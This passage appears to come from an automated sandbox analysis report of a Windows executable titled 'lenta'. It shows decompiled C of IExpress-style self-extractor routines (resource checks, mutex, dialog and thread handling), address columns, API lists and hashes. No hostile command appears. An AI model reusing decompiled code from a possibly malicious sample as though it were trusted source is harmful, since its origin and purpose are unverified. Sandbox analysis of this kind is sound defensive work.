					_t37 = LoadStringA( *0x59a3c, 0x3e8, 0x58598, 0x200);
					__eflags = _t37;
					if(_t37 != 0) {
						_t38 = E00054224(_t64, _t46, _t46);
						__eflags = _t38;
						if(_t38 == 0) {
							goto L36;
						}
						_t39 = SetDlgItemTextA(_t64, 0x835, 0x587a0);
						__eflags = _t39;
						if(_t39 != 0) {
							goto L36;
						}
						_t63 = 0x4c0;
						L9:
						E000544B9(_t64, _t63, 0, 0, 0x10, 0);
						_push(0);
						goto L38;
					}
					_t63 = 0x4b1;
					goto L9;
				}
				return 0;
			}

























                                                                                                                                                                                                                                                0x0005321b
                                                                                                                                                                                                                                                0x0005321e
                                                                                                                                                                                                                                                0x00053221
                                                                                                                                                                                                                                                0x0005343c
                                                                                                                                                                                                                                                0x0005343e
                                                                                                                                                                                                                                                0x0005343f
                                                                                                                                                                                                                                                0x00053445
                                                                                                                                                                                                                                                0x00053447
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00053447
                                                                                                                                                                                                                                                0x00053229
                                                                                                                                                                                                                                                0x0005322a
                                                                                                                                                                                                                                                0x0005322f
                                                                                                                                                                                                                                                0x000533ec
                                                                                                                                                                                                                                                0x000533f7
                                                                                                                                                                                                                                                0x00053410
                                                                                                                                                                                                                                                0x00053416
                                                                                                                                                                                                                                                0x0005341d
                                                                                                                                                                                                                                                0x0005342d
                                                                                                                                                                                                                                                0x0005342d
                                                                                                                                                                                                                                                0x00053438
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00053438
                                                                                                                                                                                                                                                0x00053237
                                                                                                                                                                                                                                                0x00053243
                                                                                                                                                                                                                                                0x00053243
                                                                                                                                                                                                                                                0x00053246
                                                                                                                                                                                                                                                0x000532ee
                                                                                                                                                                                                                                                0x000532f4
                                                                                                                                                                                                                                                0x000532f6
                                                                                                                                                                                                                                                0x000533d4
                                                                                                                                                                                                                                                0x000533d6
                                                                                                                                                                                                                                                0x000533db
                                                                                                                                                                                                                                                0x000533dc
                                                                                                                                                                                                                                                0x000533de
                                                                                                                                                                                                                                                0x000533df
                                                                                                                                                                                                                                                0x00053370
                                                                                                                                                                                                                                                0x00053372
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00053372
                                                                                                                                                                                                                                                0x000532fc
                                                                                                                                                                                                                                                0x00053301
                                                                                                                                                                                                                                                0x00053301
                                                                                                                                                                                                                                                0x00053303
                                                                                                                                                                                                                                                0x00053304
                                                                                                                                                                                                                                                0x00053304
                                                                                                                                                                                                                                                0x0005330a
                                                                                                                                                                                                                                                0x0005330d
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00053313
                                                                                                                                                                                                                                                0x00053318
                                                                                                                                                                                                                                                0x0005331a
                                                                                                                                                                                                                                                0x00053331
                                                                                                                                                                                                                                                0x00053332
                                                                                                                                                                                                                                                0x0005333a
                                                                                                                                                                                                                                                0x0005333d
                                                                                                                                                                                                                                                0x0005337c
                                                                                                                                                                                                                                                0x00053388
                                                                                                                                                                                                                                                0x0005338f
                                                                                                                                                                                                                                                0x00053394
                                                                                                                                                                                                                                                0x00053396
                                                                                                                                                                                                                                                0x000533a4
                                                                                                                                                                                                                                                0x000533ab
                                                                                                                                                                                                                                                0x000533b6
                                                                                                                                                                                                                                                0x000533be
                                                                                                                                                                                                                                                0x000533c3
                                                                                                                                                                                                                                                0x000533c5
                                                                                                                                                                                                                                                0x00053435
                                                                                                                                                                                                                                                0x00053437
                                                                                                                                                                                                                                                0x00053437
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00053437
                                                                                                                                                                                                                                                0x000533c7
                                                                                                                                                                                                                                                0x000533c9
                                                                                                                                                                                                                                                0x000533cc
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x000533cc
                                                                                                                                                                                                                                                0x000533ad
                                                                                                                                                                                                                                                0x000533b4
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x000533b4
                                                                                                                                                                                                                                                0x00053398
                                                                                                                                                                                                                                                0x00053399
                                                                                                                                                                                                                                                0x0005339b
                                                                                                                                                                                                                                                0x0005339c
                                                                                                                                                                                                                                                0x0005339d
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x0005339d
                                                                                                                                                                                                                                                0x0005334c
                                                                                                                                                                                                                                                0x00053351
                                                                                                                                                                                                                                                0x00053354
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x0005335c
                                                                                                                                                                                                                                                0x00053362
                                                                                                                                                                                                                                                0x00053364
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00053366
                                                                                                                                                                                                                                                0x00053367
                                                                                                                                                                                                                                                0x00053369
                                                                                                                                                                                                                                                0x0005336a
                                                                                                                                                                                                                                                0x0005336b
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x0005336b
                                                                                                                                                                                                                                                0x0005331c
                                                                                                                                                                                                                                                0x00053323
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00053329
                                                                                                                                                                                                                                                0x0005332b
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x0005332b
                                                                                                                                                                                                                                                0x0005324c
                                                                                                                                                                                                                                                0x0005324c
                                                                                                                                                                                                                                                0x0005324f
                                                                                                                                                                                                                                                0x000532c8
                                                                                                                                                                                                                                                0x000532ce
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x000532ce
                                                                                                                                                                                                                                                0x00053251
                                                                                                                                                                                                                                                0x00053256
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00053271
                                                                                                                                                                                                                                                0x00053277
                                                                                                                                                                                                                                                0x00053279
                                                                                                                                                                                                                                                0x00053298
                                                                                                                                                                                                                                                0x0005329d
                                                                                                                                                                                                                                                0x0005329f
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x000532b0
                                                                                                                                                                                                                                                0x000532b6
                                                                                                                                                                                                                                                0x000532b8
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x000532be
                                                                                                                                                                                                                                                0x00053280
                                                                                                                                                                                                                                                0x00053289
                                                                                                                                                                                                                                                0x0005328e
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x0005328e
                                                                                                                                                                                                                                                0x0005327b
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x0005327b
                                                                                                                                                                                                                                                0x00000000

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • LoadStringA.USER32(000003E8,00058598,00000200), ref: 00053271
                                                                                                                                                                                                                                                • GetDesktopWindow.USER32 ref: 000533E2
                                                                                                                                                                                                                                                • SetWindowTextA.USER32(?,lenta), ref: 000533F7
                                                                                                                                                                                                                                                • SendDlgItemMessageA.USER32(?,00000835,000000C5,00000103,00000000), ref: 00053410
                                                                                                                                                                                                                                                • GetDlgItem.USER32(?,00000836), ref: 00053426
                                                                                                                                                                                                                                                • EnableWindow.USER32(00000000), ref: 0005342D
                                                                                                                                                                                                                                                • EndDialog.USER32(?,00000000), ref: 0005343F
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.394017135.0000000000051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00050000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394008394.0000000000050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394029552.0000000000058000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394038626.000000000005A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394038626.000000000005C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_50000_file.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Window$Item$DesktopDialogEnableLoadMessageSendStringText
                                                                                                                                                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$lenta
                                                                                                                                                                                                                                                • API String ID: 2418873061-406680565
                                                                                                                                                                                                                                                • Opcode ID: 20ca5870124be0c8b7673dcb0efca8d5ddbdbaa9241293a9d2debc53f921d8c7
                                                                                                                                                                                                                                                • Instruction ID: 57af0957728353ca2c5dcff57755c5be47d0fc4c8db771c78f5acf9d1e4cf914
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 20ca5870124be0c8b7673dcb0efca8d5ddbdbaa9241293a9d2debc53f921d8c7
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4D512330380740BAFB621B354C4CFBF2E8CDB86B87F104528FE01960C1CAB88B499665
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Function 00052CAA Relevance: 26.4, APIs: 10, Strings: 5, Instructions: 183synchronizationCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                C-Code - Quality: 93%
                                                                                                                                                                                                                                                			E00052CAA(struct HINSTANCE__* __ecx, void* __edx, void* __eflags) {
				signed int _v8;
				char _v268;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t13;
				void* _t20;
				void* _t23;
				void* _t27;
				struct HRSRC__* _t31;
				intOrPtr _t33;
				void* _t43;
				void* _t48;
				signed int _t65;
				struct HINSTANCE__* _t66;
				signed int _t67;

				_t13 =  *0x58004; // 0x5a679bd9
				_v8 = _t13 ^ _t67;
				_t65 = 0;
				_t66 = __ecx;
				_t48 = __edx;
				 *0x59a3c = __ecx;
				memset(0x59140, 0, 0x8fc);
				memset(0x58a20, 0, 0x32c);
				memset(0x588c0, 0, 0x104);
				 *0x593ec = 1;
				_t20 = E0005468F("TITLE", 0x59154, 0x7f);
				if(_t20 == 0 || _t20 > 0x80) {
					_t64 = 0x4b1;
					goto L32;
				} else {
					_t27 = CreateEventA(0, 1, 1, 0);
					 *0x5858c = _t27;
					SetEvent(_t27);
					_t64 = 0x59a34;
					if(E0005468F("EXTRACTOPT", 0x59a34, 4) != 0) {
						if(( *0x59a34 & 0x000000c0) == 0) {
							L12:
							 *0x59120 =  *0x59120 & _t65;
							if(E00055C9E(_t48, _t48, _t65, _t66) != 0) {
								if( *0x58a3a == 0) {
									_t31 = FindResourceA(_t66, "VERCHECK", 0xa);
									if(_t31 != 0) {
										_t65 = LoadResource(_t66, _t31);
									}
									if( *0x58184 != 0) {
										__imp__#17();
									}
									if( *0x58a24 == 0) {
										_t57 = _t65;
										if(E000536EE(_t65) == 0) {
											goto L33;
										} else {
											_t33 =  *0x59a40; // 0x3
											_t48 = 1;
											if(_t33 == 1 || _t33 == 2 || _t33 == 3) {
												if(( *0x59a34 & 0x00000100) == 0 || ( *0x58a38 & 0x00000001) != 0 || E000518A3(_t64, _t66) != 0) {
													goto L30;
												} else {
													_t64 = 0x7d6;
													if(E00056517(_t57, 0x7d6, _t34, E000519E0, 0x547, 0x83e) != 0x83d) {
														goto L33;
													} else {
														goto L30;
													}
												}
											} else {
												L30:
												_t23 = _t48;
											}
										}
									} else {
										_t23 = 1;
									}
								} else {
									E00052390(0x58a3a);
									goto L33;
								}
							} else {
								_t64 = 0x520;
								L32:
								E000544B9(0, _t64, 0, 0, 0x10, 0);
								goto L33;
							}
						} else {
							_t64 =  &_v268;
							if(E0005468F("INSTANCECHECK",  &_v268, 0x104) == 0) {
								goto L3;
							} else {
								_t43 = CreateMutexA(0, 1,  &_v268);
								 *0x58588 = _t43;
								if(_t43 == 0 || GetLastError() != 0xb7) {
									goto L12;
								} else {
									if(( *0x59a34 & 0x00000080) == 0) {
										_t64 = 0x524;
										if(E000544B9(0, 0x524, ?str?, 0, 0x20, 4) == 6) {
											goto L12;
										} else {
											goto L11;
										}
									} else {
										_t64 = 0x54b;
										E000544B9(0, 0x54b, "lenta", 0, 0x10, 0);
										L11:
										CloseHandle( *0x58588);
										 *0x59124 = 0x800700b7;
										goto L33;
									}
								}
							}
						}
					} else {
						L3:
						_t64 = 0x4b1;
						E000544B9(0, 0x4b1, 0, 0, 0x10, 0);
						 *0x59124 = 0x80070714;
						L33:
						_t23 = 0;
					}
				}
				return E00056CE0(_t23, _t48, _v8 ^ _t67, _t64, _t65, _t66);
			}



















                                                                                                                                                                                                                                                0x00052cb5
                                                                                                                                                                                                                                                0x00052cbc
                                                                                                                                                                                                                                                0x00052cc7
                                                                                                                                                                                                                                                0x00052cc9
                                                                                                                                                                                                                                                0x00052cd1
                                                                                                                                                                                                                                                0x00052cd3
                                                                                                                                                                                                                                                0x00052cd9
                                                                                                                                                                                                                                                0x00052ce9
                                                                                                                                                                                                                                                0x00052cf9
                                                                                                                                                                                                                                                0x00052d0e
                                                                                                                                                                                                                                                0x00052d15
                                                                                                                                                                                                                                                0x00052d1c
                                                                                                                                                                                                                                                0x00052ef3
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00052d2d
                                                                                                                                                                                                                                                0x00052d34
                                                                                                                                                                                                                                                0x00052d3b
                                                                                                                                                                                                                                                0x00052d40
                                                                                                                                                                                                                                                0x00052d48
                                                                                                                                                                                                                                                0x00052d59
                                                                                                                                                                                                                                                0x00052d84
                                                                                                                                                                                                                                                0x00052e1f
                                                                                                                                                                                                                                                0x00052e1f
                                                                                                                                                                                                                                                0x00052e2e
                                                                                                                                                                                                                                                0x00052e41
                                                                                                                                                                                                                                                0x00052e5a
                                                                                                                                                                                                                                                0x00052e62
                                                                                                                                                                                                                                                0x00052e6c
                                                                                                                                                                                                                                                0x00052e6c
                                                                                                                                                                                                                                                0x00052e75
                                                                                                                                                                                                                                                0x00052e77
                                                                                                                                                                                                                                                0x00052e77
                                                                                                                                                                                                                                                0x00052e84
                                                                                                                                                                                                                                                0x00052e8b
                                                                                                                                                                                                                                                0x00052e94
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00052e96
                                                                                                                                                                                                                                                0x00052e96
                                                                                                                                                                                                                                                0x00052e9e
                                                                                                                                                                                                                                                0x00052ea2
                                                                                                                                                                                                                                                0x00052eba
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00052ece
                                                                                                                                                                                                                                                0x00052ede
                                                                                                                                                                                                                                                0x00052eed
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00052eed
                                                                                                                                                                                                                                                0x00052eef
                                                                                                                                                                                                                                                0x00052eef
                                                                                                                                                                                                                                                0x00052eef
                                                                                                                                                                                                                                                0x00052eef
                                                                                                                                                                                                                                                0x00052ea2
                                                                                                                                                                                                                                                0x00052e86
                                                                                                                                                                                                                                                0x00052e88
                                                                                                                                                                                                                                                0x00052e88
                                                                                                                                                                                                                                                0x00052e43
                                                                                                                                                                                                                                                0x00052e48
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00052e48
                                                                                                                                                                                                                                                0x00052e30
                                                                                                                                                                                                                                                0x00052e30
                                                                                                                                                                                                                                                0x00052ef8
                                                                                                                                                                                                                                                0x00052f01
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00052f01
                                                                                                                                                                                                                                                0x00052d8a
                                                                                                                                                                                                                                                0x00052d8f
                                                                                                                                                                                                                                                0x00052da1
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00052da3
                                                                                                                                                                                                                                                0x00052dae
                                                                                                                                                                                                                                                0x00052db4
                                                                                                                                                                                                                                                0x00052dbb
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00052dca
                                                                                                                                                                                                                                                0x00052dd3
                                                                                                                                                                                                                                                0x00052df5
                                                                                                                                                                                                                                                0x00052e02
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00052dd5
                                                                                                                                                                                                                                                0x00052dde
                                                                                                                                                                                                                                                0x00052de3
                                                                                                                                                                                                                                                0x00052e04
                                                                                                                                                                                                                                                0x00052e0a
                                                                                                                                                                                                                                                0x00052e10
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00052e10
                                                                                                                                                                                                                                                0x00052dd3
                                                                                                                                                                                                                                                0x00052dbb
                                                                                                                                                                                                                                                0x00052da1
                                                                                                                                                                                                                                                0x00052d5b
                                                                                                                                                                                                                                                0x00052d5b
                                                                                                                                                                                                                                                0x00052d5d
                                                                                                                                                                                                                                                0x00052d69
                                                                                                                                                                                                                                                0x00052d6e
                                                                                                                                                                                                                                                0x00052f06
                                                                                                                                                                                                                                                0x00052f06
                                                                                                                                                                                                                                                0x00052f06
                                                                                                                                                                                                                                                0x00052d59
                                                                                                                                                                                                                                                0x00052f18

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • memset.MSVCRT ref: 00052CD9
                                                                                                                                                                                                                                                • memset.MSVCRT ref: 00052CE9
                                                                                                                                                                                                                                                • memset.MSVCRT ref: 00052CF9
                                                                                                                                                                                                                                                  • Part of subcall function 0005468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 000546A0
                                                                                                                                                                                                                                                  • Part of subcall function 0005468F: SizeofResource.KERNEL32(00000000,00000000,?,00052D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 000546A9
                                                                                                                                                                                                                                                  • Part of subcall function 0005468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 000546C3
                                                                                                                                                                                                                                                  • Part of subcall function 0005468F: LoadResource.KERNEL32(00000000,00000000,?,00052D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 000546CC
                                                                                                                                                                                                                                                  • Part of subcall function 0005468F: LockResource.KERNEL32(00000000,?,00052D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 000546D3
                                                                                                                                                                                                                                                  • Part of subcall function 0005468F: memcpy_s.MSVCRT ref: 000546E5
                                                                                                                                                                                                                                                  • Part of subcall function 0005468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 000546EF
                                                                                                                                                                                                                                                • CreateEventA.KERNEL32(00000000,00000001,00000001,00000000,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00052D34
                                                                                                                                                                                                                                                • SetEvent.KERNEL32(00000000,?,?,?,?,?,?,?,00000002,00000000), ref: 00052D40
                                                                                                                                                                                                                                                • CreateMutexA.KERNEL32(00000000,00000001,?,00000104,00000004,?,?,?,?,?,?,?,00000002,00000000), ref: 00052DAE
                                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 00052DBD
                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(lenta,00000000,00000020,00000004,?,?,?,?,?,?,?,00000002,00000000), ref: 00052E0A
                                                                                                                                                                                                                                                  • Part of subcall function 000544B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00054518
                                                                                                                                                                                                                                                  • Part of subcall function 000544B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 00054554
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.394017135.0000000000051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00050000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394008394.0000000000050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394029552.0000000000058000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394038626.000000000005A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394038626.000000000005C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_50000_file.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Resource$memset$CreateEventFindLoad$CloseErrorFreeHandleLastLockMessageMutexSizeofStringmemcpy_s
                                                                                                                                                                                                                                                • String ID: EXTRACTOPT$INSTANCECHECK$TITLE$VERCHECK$lenta
                                                                                                                                                                                                                                                • API String ID: 1002816675-2993962200
                                                                                                                                                                                                                                                • Opcode ID: d389a787426483f5cee60cdcd45cea87e1b14b36050a5408999a10d5dc60df9b
                                                                                                                                                                                                                                                • Instruction ID: 48a108b54eb7b93755162f3392b09e93e7435b2d8e9dccafa47bfb6acb7a72d1
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d389a787426483f5cee60cdcd45cea87e1b14b36050a5408999a10d5dc60df9b
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3B51C370340301AAFB60A7319C4BBBB26D8DF47707F044439BE46D61D6DAB8888DCB26
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Function 000534F0 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 119threadwindowCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                C-Code - Quality: 81%
                                                                                                                                                                                                                                                			E000534F0(struct HWND__* _a4, intOrPtr _a8, int _a12) {
				void* _t9;
				void* _t12;
				void* _t13;
				void* _t17;
				void* _t23;
				void* _t25;
				struct HWND__* _t35;
				struct HWND__* _t38;
				void* _t39;

				_t9 = _a8 - 0x10;
				if(_t9 == 0) {
					__eflags = 1;
					L19:
					_push(0);
					 *0x591d8 = 1;
					L20:
					_push(_a4);
					L21:
					EndDialog();
					L22:
					return 1;
				}
				_push(1);
				_pop(1);
				_t12 = _t9 - 0xf2;
				if(_t12 == 0) {
					__eflags = _a12 - 0x1b;
					if(_a12 != 0x1b) {
						goto L22;
					}
					goto L19;
				}
				_t13 = _t12 - 0xe;
				if(_t13 == 0) {
					_t35 = _a4;
					 *0x58584 = _t35;
					E000543D0(_t35, GetDesktopWindow());
					__eflags =  *0x58184; // 0x1
					if(__eflags != 0) {
						SendMessageA(GetDlgItem(_t35, 0x83b), 0x464, 0, 0xbb9);
						SendMessageA(GetDlgItem(_t35, 0x83b), 0x465, 0xffffffff, 0xffff0000);
					}
					SetWindowTextA(_t35, "lenta");
					_t17 = CreateThread(0, 0, E00054FE0, 0, 0, 0x58798);
					 *0x5879c = _t17;
					__eflags = _t17;
					if(_t17 != 0) {
						goto L22;
					} else {
						E000544B9(_t35, 0x4b8, 0, 0, 0x10, 0);
						_push(0);
						_push(_t35);
						goto L21;
					}
				}
				_t23 = _t13 - 1;
				if(_t23 == 0) {
					__eflags = _a12 - 2;
					if(_a12 != 2) {
						goto L22;
					}
					ResetEvent( *0x5858c);
					_t38 =  *0x58584; // 0x0
					_t25 = E000544B9(_t38, 0x4b2, 0x51140, 0, 0x20, 4);
					__eflags = _t25 - 6;
					if(_t25 == 6) {
						L11:
						 *0x591d8 = 1;
						SetEvent( *0x5858c);
						_t39 =  *0x5879c; // 0x0
						E00053680(_t39);
						_push(0);
						goto L20;
					}
					__eflags = _t25 - 1;
					if(_t25 == 1) {
						goto L11;
					}
					SetEvent( *0x5858c);
					goto L22;
				}
				if(_t23 == 0xe90) {
					TerminateThread( *0x5879c, 0);
					EndDialog(_a4, _a12);
					return 1;
				}
				return 0;
			}












                                                                                                                                                                                                                                                0x000534fb
                                                                                                                                                                                                                                                0x000534fe
                                                                                                                                                                                                                                                0x00053665
                                                                                                                                                                                                                                                0x00053666
                                                                                                                                                                                                                                                0x00053666
                                                                                                                                                                                                                                                0x00053668
                                                                                                                                                                                                                                                0x0005366e
                                                                                                                                                                                                                                                0x0005366e
                                                                                                                                                                                                                                                0x00053671
                                                                                                                                                                                                                                                0x00053671
                                                                                                                                                                                                                                                0x00053677
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00053677
                                                                                                                                                                                                                                                0x00053504
                                                                                                                                                                                                                                                0x00053506
                                                                                                                                                                                                                                                0x00053507
                                                                                                                                                                                                                                                0x0005350c
                                                                                                                                                                                                                                                0x0005365b
                                                                                                                                                                                                                                                0x0005365f
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00053661
                                                                                                                                                                                                                                                0x00053512
                                                                                                                                                                                                                                                0x00053515
                                                                                                                                                                                                                                                0x000535be
                                                                                                                                                                                                                                                0x000535c1
                                                                                                                                                                                                                                                0x000535d1
                                                                                                                                                                                                                                                0x000535d8
                                                                                                                                                                                                                                                0x000535de
                                                                                                                                                                                                                                                0x000535f8
                                                                                                                                                                                                                                                0x00053617
                                                                                                                                                                                                                                                0x00053617
                                                                                                                                                                                                                                                0x00053623
                                                                                                                                                                                                                                                0x00053637
                                                                                                                                                                                                                                                0x0005363d
                                                                                                                                                                                                                                                0x00053642
                                                                                                                                                                                                                                                0x00053644
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00053646
                                                                                                                                                                                                                                                0x00053652
                                                                                                                                                                                                                                                0x00053657
                                                                                                                                                                                                                                                0x00053658
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00053658
                                                                                                                                                                                                                                                0x00053644
                                                                                                                                                                                                                                                0x0005351b
                                                                                                                                                                                                                                                0x0005351d
                                                                                                                                                                                                                                                0x0005354f
                                                                                                                                                                                                                                                0x00053553
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x0005355f
                                                                                                                                                                                                                                                0x00053565
                                                                                                                                                                                                                                                0x0005357c
                                                                                                                                                                                                                                                0x00053581
                                                                                                                                                                                                                                                0x00053584
                                                                                                                                                                                                                                                0x0005359b
                                                                                                                                                                                                                                                0x000535a1
                                                                                                                                                                                                                                                0x000535a7
                                                                                                                                                                                                                                                0x000535ad
                                                                                                                                                                                                                                                0x000535b3
                                                                                                                                                                                                                                                0x000535b8
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x000535b8
                                                                                                                                                                                                                                                0x00053586
                                                                                                                                                                                                                                                0x00053588
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00053590
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00053590
                                                                                                                                                                                                                                                0x00053524
                                                                                                                                                                                                                                                0x00053535
                                                                                                                                                                                                                                                0x00053541
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00053549
                                                                                                                                                                                                                                                0x00000000

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • TerminateThread.KERNEL32(00000000), ref: 00053535
                                                                                                                                                                                                                                                • EndDialog.USER32(?,?), ref: 00053541
                                                                                                                                                                                                                                                • ResetEvent.KERNEL32 ref: 0005355F
                                                                                                                                                                                                                                                • SetEvent.KERNEL32(00051140,00000000,00000020,00000004), ref: 00053590
                                                                                                                                                                                                                                                • GetDesktopWindow.USER32 ref: 000535C7
                                                                                                                                                                                                                                                • GetDlgItem.USER32(?,0000083B), ref: 000535F1
                                                                                                                                                                                                                                                • SendMessageA.USER32(00000000), ref: 000535F8
                                                                                                                                                                                                                                                • GetDlgItem.USER32(?,0000083B), ref: 00053610
                                                                                                                                                                                                                                                • SendMessageA.USER32(00000000), ref: 00053617
                                                                                                                                                                                                                                                • SetWindowTextA.USER32(?,lenta), ref: 00053623
                                                                                                                                                                                                                                                • CreateThread.KERNEL32 ref: 00053637
                                                                                                                                                                                                                                                • EndDialog.USER32(?,00000000), ref: 00053671
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.394017135.0000000000051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00050000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394008394.0000000000050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394029552.0000000000058000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394038626.000000000005A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394038626.000000000005C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_50000_file.jbxd
                                                                                                                                                                                                                                                Similarity
